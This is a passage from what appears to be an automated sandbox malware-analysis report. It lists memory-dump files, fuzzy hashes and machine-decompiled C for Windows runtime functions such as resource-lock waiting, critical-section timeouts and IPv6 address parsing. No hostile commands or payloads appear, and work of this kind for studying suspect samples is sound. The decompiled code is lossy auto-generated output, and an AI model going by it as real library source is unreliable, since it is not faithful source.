                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                        • Opcode ID: 72411da80ffb43d8b13a7356b4c59b21f9843f3b1e8695b0bb8c1d600a3c5446
                                                                                                                                                        • Instruction ID: 444ab5abf151cf9426fbf91097ed4daa0a7fd3945a6337aca087b7ae0896b99f
                                                                                                                                                        • Opcode Fuzzy Hash: 72411da80ffb43d8b13a7356b4c59b21f9843f3b1e8695b0bb8c1d600a3c5446
                                                                                                                                                        • Instruction Fuzzy Hash: 692181729003199BDB20EE54CC40AEBB3EDAB10704F444566ED8AD7140DB74EA59CBE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 023653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                                        			E023653A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x024201c0;
									_push(_t92);
									_push(0);
									_t37 = E0233F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02384FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02393F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02393F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E023C217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02393F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02383915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02365384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0233F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02383915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0233F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02383915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0233F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02383915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02365329(_t74, _t92);
													_push(1);
													_t48 = E023653A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                        0x023653ab
                                                                                                                                                        0x023653ae
                                                                                                                                                        0x023653b1
                                                                                                                                                        0x023653b4
                                                                                                                                                        0x023653b7
                                                                                                                                                        0x023805b6
                                                                                                                                                        0x023805c0
                                                                                                                                                        0x023805c3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023805c9
                                                                                                                                                        0x023805c9
                                                                                                                                                        0x023805cc
                                                                                                                                                        0x023805d5
                                                                                                                                                        0x023805d5
                                                                                                                                                        0x023653bd
                                                                                                                                                        0x023653bd
                                                                                                                                                        0x023653bd
                                                                                                                                                        0x023653be
                                                                                                                                                        0x023653be
                                                                                                                                                        0x023653be
                                                                                                                                                        0x023653c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a2269
                                                                                                                                                        0x023a226d
                                                                                                                                                        0x023a2349
                                                                                                                                                        0x023a234d
                                                                                                                                                        0x023a2273
                                                                                                                                                        0x023a2276
                                                                                                                                                        0x023a2279
                                                                                                                                                        0x023a227e
                                                                                                                                                        0x023a2283
                                                                                                                                                        0x023a2287
                                                                                                                                                        0x023a228a
                                                                                                                                                        0x023a228d
                                                                                                                                                        0x023a228f
                                                                                                                                                        0x023a22bc
                                                                                                                                                        0x023a22bc
                                                                                                                                                        0x023a22bc
                                                                                                                                                        0x023a22be
                                                                                                                                                        0x023a22c4
                                                                                                                                                        0x023a22cc
                                                                                                                                                        0x023a22d0
                                                                                                                                                        0x023a22d6
                                                                                                                                                        0x023a22d7
                                                                                                                                                        0x023a22da
                                                                                                                                                        0x023a22df
                                                                                                                                                        0x023a22e4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22e6
                                                                                                                                                        0x023a22e9
                                                                                                                                                        0x023a22f4
                                                                                                                                                        0x023a22f9
                                                                                                                                                        0x023a22fa
                                                                                                                                                        0x023a2305
                                                                                                                                                        0x023a2314
                                                                                                                                                        0x023a2319
                                                                                                                                                        0x023a231a
                                                                                                                                                        0x023a231d
                                                                                                                                                        0x023a2320
                                                                                                                                                        0x023a2323
                                                                                                                                                        0x023a2323
                                                                                                                                                        0x023a2328
                                                                                                                                                        0x023a232d
                                                                                                                                                        0x023a232f
                                                                                                                                                        0x023a2331
                                                                                                                                                        0x023a2336
                                                                                                                                                        0x023a2336
                                                                                                                                                        0x023a233b
                                                                                                                                                        0x023a233d
                                                                                                                                                        0x023a2350
                                                                                                                                                        0x023a2351
                                                                                                                                                        0x023a2356
                                                                                                                                                        0x023a2359
                                                                                                                                                        0x023a2359
                                                                                                                                                        0x023a235b
                                                                                                                                                        0x023a235d
                                                                                                                                                        0x02365367
                                                                                                                                                        0x0236536b
                                                                                                                                                        0x02365372
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a2363
                                                                                                                                                        0x023a2363
                                                                                                                                                        0x023a2369
                                                                                                                                                        0x023a236a
                                                                                                                                                        0x023a236c
                                                                                                                                                        0x023a2371
                                                                                                                                                        0x023a2373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a2379
                                                                                                                                                        0x023a2379
                                                                                                                                                        0x023a237a
                                                                                                                                                        0x023a237f
                                                                                                                                                        0x023a237f
                                                                                                                                                        0x023a2385
                                                                                                                                                        0x023a2386
                                                                                                                                                        0x023a2389
                                                                                                                                                        0x023a238e
                                                                                                                                                        0x023a2390
                                                                                                                                                        0x02365378
                                                                                                                                                        0x0236537c
                                                                                                                                                        0x023a2396
                                                                                                                                                        0x023a2396
                                                                                                                                                        0x023a2397
                                                                                                                                                        0x023a239c
                                                                                                                                                        0x023a23a2
                                                                                                                                                        0x023a23a3
                                                                                                                                                        0x023a23a6
                                                                                                                                                        0x023a23ab
                                                                                                                                                        0x023a23ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a23b3
                                                                                                                                                        0x023a23b3
                                                                                                                                                        0x023a23b4
                                                                                                                                                        0x023a23b9
                                                                                                                                                        0x023a23ba
                                                                                                                                                        0x023a23ba
                                                                                                                                                        0x023a23bc
                                                                                                                                                        0x023a23bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02399153
                                                                                                                                                        0x02399158
                                                                                                                                                        0x0239915a
                                                                                                                                                        0x0239915e
                                                                                                                                                        0x02399160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02399166
                                                                                                                                                        0x02399166
                                                                                                                                                        0x02399171
                                                                                                                                                        0x02399176
                                                                                                                                                        0x02399176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02399160
                                                                                                                                                        0x023a23c6
                                                                                                                                                        0x023a23cb
                                                                                                                                                        0x023a23ce
                                                                                                                                                        0x023a23d7
                                                                                                                                                        0x023a23d7
                                                                                                                                                        0x023a23ad
                                                                                                                                                        0x023a2390
                                                                                                                                                        0x023a2373
                                                                                                                                                        0x023a233f
                                                                                                                                                        0x023a233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a233f
                                                                                                                                                        0x023a2291
                                                                                                                                                        0x023a2291
                                                                                                                                                        0x023a2293
                                                                                                                                                        0x023a2295
                                                                                                                                                        0x023a229a
                                                                                                                                                        0x023a22a1
                                                                                                                                                        0x023a22a3
                                                                                                                                                        0x023a22a7
                                                                                                                                                        0x023a22a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22ab
                                                                                                                                                        0x023a22ad
                                                                                                                                                        0x023a22af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22af
                                                                                                                                                        0x023a22b1
                                                                                                                                                        0x023a22b4
                                                                                                                                                        0x023a22b4
                                                                                                                                                        0x023a22b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22b6
                                                                                                                                                        0x023a228f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a226d
                                                                                                                                                        0x023653cb
                                                                                                                                                        0x023653ce
                                                                                                                                                        0x023653d0
                                                                                                                                                        0x023653d4
                                                                                                                                                        0x023653d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023653d8
                                                                                                                                                        0x023653e3
                                                                                                                                                        0x023653ea
                                                                                                                                                        0x023653ea
                                                                                                                                                        0x023653d6
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023A22F4
                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023A22FC
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 023A2328
                                                                                                                                                        • RTL: Resource at %p, xrefs: 023A230B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-871070163
                                                                                                                                                        • Opcode ID: fc126c75b810acf692ed5846c4be747a4c616254d74cd116f267135edf8ff3ed
                                                                                                                                                        • Instruction ID: 9ada1606a209c62f0150edc4279428f0308ddaf44d4db29d5aa6c5943e0cf83c
                                                                                                                                                        • Opcode Fuzzy Hash: fc126c75b810acf692ed5846c4be747a4c616254d74cd116f267135edf8ff3ed
                                                                                                                                                        • Instruction Fuzzy Hash: 3851E6716007016BEB259B28CC94FA773ADEF55724F218279FD05DB284EB61E8418BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0236EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E0236EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0235DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x242793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E023416C0(_t39);
				} else {
					_t40 = E0233F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02383915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E023401A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x242793c; // 0x0
								_push(_t85);
								_t44 = E02341F28(_t71);
							} else {
								_t44 = E0233F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02383915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E023C2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0236EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02384FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02393F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02393F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x24220c0;
								if(_t85 != 0x24220c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E023C217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02393F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                        0x0236ec56
                                                                                                                                                        0x0236ec56
                                                                                                                                                        0x0236ec56
                                                                                                                                                        0x0236ec5c
                                                                                                                                                        0x0236ec64
                                                                                                                                                        0x023a23e6
                                                                                                                                                        0x023a23eb
                                                                                                                                                        0x023a23eb
                                                                                                                                                        0x0236ec6a
                                                                                                                                                        0x0236ec6c
                                                                                                                                                        0x0236ec6f
                                                                                                                                                        0x023a23f3
                                                                                                                                                        0x023a23f8
                                                                                                                                                        0x023a23fa
                                                                                                                                                        0x023a23fc
                                                                                                                                                        0x0236ec75
                                                                                                                                                        0x0236ec76
                                                                                                                                                        0x0236ec76
                                                                                                                                                        0x0236ec7b
                                                                                                                                                        0x0236ec7c
                                                                                                                                                        0x0236ec7e
                                                                                                                                                        0x023a2406
                                                                                                                                                        0x023a2407
                                                                                                                                                        0x023a240c
                                                                                                                                                        0x023a240d
                                                                                                                                                        0x023a240d
                                                                                                                                                        0x023a240d
                                                                                                                                                        0x023a2414
                                                                                                                                                        0x023a2417
                                                                                                                                                        0x023a241e
                                                                                                                                                        0x023a2435
                                                                                                                                                        0x023a2438
                                                                                                                                                        0x023a243c
                                                                                                                                                        0x023a243f
                                                                                                                                                        0x023a2442
                                                                                                                                                        0x023a2443
                                                                                                                                                        0x023a2446
                                                                                                                                                        0x023a2449
                                                                                                                                                        0x023a2453
                                                                                                                                                        0x023a2455
                                                                                                                                                        0x023a245b
                                                                                                                                                        0x023a245b
                                                                                                                                                        0x0236eb99
                                                                                                                                                        0x0236eb99
                                                                                                                                                        0x0236eb9c
                                                                                                                                                        0x0236eb9d
                                                                                                                                                        0x0236eb9f
                                                                                                                                                        0x0236eba2
                                                                                                                                                        0x023a2465
                                                                                                                                                        0x023a246b
                                                                                                                                                        0x023a246d
                                                                                                                                                        0x0236eba8
                                                                                                                                                        0x0236eba9
                                                                                                                                                        0x0236eba9
                                                                                                                                                        0x0236ebae
                                                                                                                                                        0x0236ebb3
                                                                                                                                                        0x0236ebb9
                                                                                                                                                        0x0236ebbb
                                                                                                                                                        0x023a2513
                                                                                                                                                        0x023a2514
                                                                                                                                                        0x023a2519
                                                                                                                                                        0x023a251b
                                                                                                                                                        0x0236ec2a
                                                                                                                                                        0x0236ec2d
                                                                                                                                                        0x0236ec33
                                                                                                                                                        0x0236ec36
                                                                                                                                                        0x0236ec3a
                                                                                                                                                        0x0236ec3e
                                                                                                                                                        0x0236ec40
                                                                                                                                                        0x0236ec47
                                                                                                                                                        0x0236ec47
                                                                                                                                                        0x0236ec40
                                                                                                                                                        0x023422c6
                                                                                                                                                        0x0236ebc1
                                                                                                                                                        0x0236ebc1
                                                                                                                                                        0x0236ebc5
                                                                                                                                                        0x0236ec9a
                                                                                                                                                        0x0236ec9a
                                                                                                                                                        0x0236ebd6
                                                                                                                                                        0x0236ebd6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0236ebbb
                                                                                                                                                        0x023a2477
                                                                                                                                                        0x023a247c
                                                                                                                                                        0x023a2486
                                                                                                                                                        0x023a248b
                                                                                                                                                        0x023a2496
                                                                                                                                                        0x023a249b
                                                                                                                                                        0x023a249d
                                                                                                                                                        0x023a24a0
                                                                                                                                                        0x023a24a3
                                                                                                                                                        0x023a24aa
                                                                                                                                                        0x023a24aa
                                                                                                                                                        0x023a24a5
                                                                                                                                                        0x023a24a5
                                                                                                                                                        0x023a24a5
                                                                                                                                                        0x023a24ac
                                                                                                                                                        0x023a24af
                                                                                                                                                        0x023a24b0
                                                                                                                                                        0x023a24b3
                                                                                                                                                        0x023a24b9
                                                                                                                                                        0x023a24ba
                                                                                                                                                        0x023a24bb
                                                                                                                                                        0x023a24c6
                                                                                                                                                        0x023a24cb
                                                                                                                                                        0x023a24cd
                                                                                                                                                        0x023a24d0
                                                                                                                                                        0x023a24d1
                                                                                                                                                        0x023a24d4
                                                                                                                                                        0x023a24d6
                                                                                                                                                        0x023a24d9
                                                                                                                                                        0x023a24d9
                                                                                                                                                        0x023a24dc
                                                                                                                                                        0x023a24df
                                                                                                                                                        0x023a24e1
                                                                                                                                                        0x023a24e7
                                                                                                                                                        0x023a24e9
                                                                                                                                                        0x023a24ec
                                                                                                                                                        0x023a24ef
                                                                                                                                                        0x023a24f2
                                                                                                                                                        0x023a24f2
                                                                                                                                                        0x023a24ef
                                                                                                                                                        0x023a24e7
                                                                                                                                                        0x023a24fa
                                                                                                                                                        0x023a24ff
                                                                                                                                                        0x023a2501
                                                                                                                                                        0x023a2503
                                                                                                                                                        0x023a2506
                                                                                                                                                        0x023a250b
                                                                                                                                                        0x0236eb8c
                                                                                                                                                        0x0236eb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0236eb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0236eb99
                                                                                                                                                        0x0236ec85
                                                                                                                                                        0x0236ec85
                                                                                                                                                        0x0236ec85
                                                                                                                                                        0x00000000

                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 023A248D
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 023A24FA
                                                                                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023A24BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                        • API String ID: 0-3177188983
                                                                                                                                                        • Opcode ID: 1d9088f5941b6002f6809935460dbb7acaf62a8d1a8906836ab1ebfdaa9f2104
                                                                                                                                                        • Instruction ID: 85d037a5c43cbc1c3ce3b7b58434787638f7dad448337174de31484e8d3913cb
                                                                                                                                                        • Opcode Fuzzy Hash: 1d9088f5941b6002f6809935460dbb7acaf62a8d1a8906836ab1ebfdaa9f2104
                                                                                                                                                        • Instruction Fuzzy Hash: 5B41EFB0A00304ABDB34EB68CC98F6B77EAEF45720F208655F9599B6C1D734E941CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0237FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0237FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0237EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
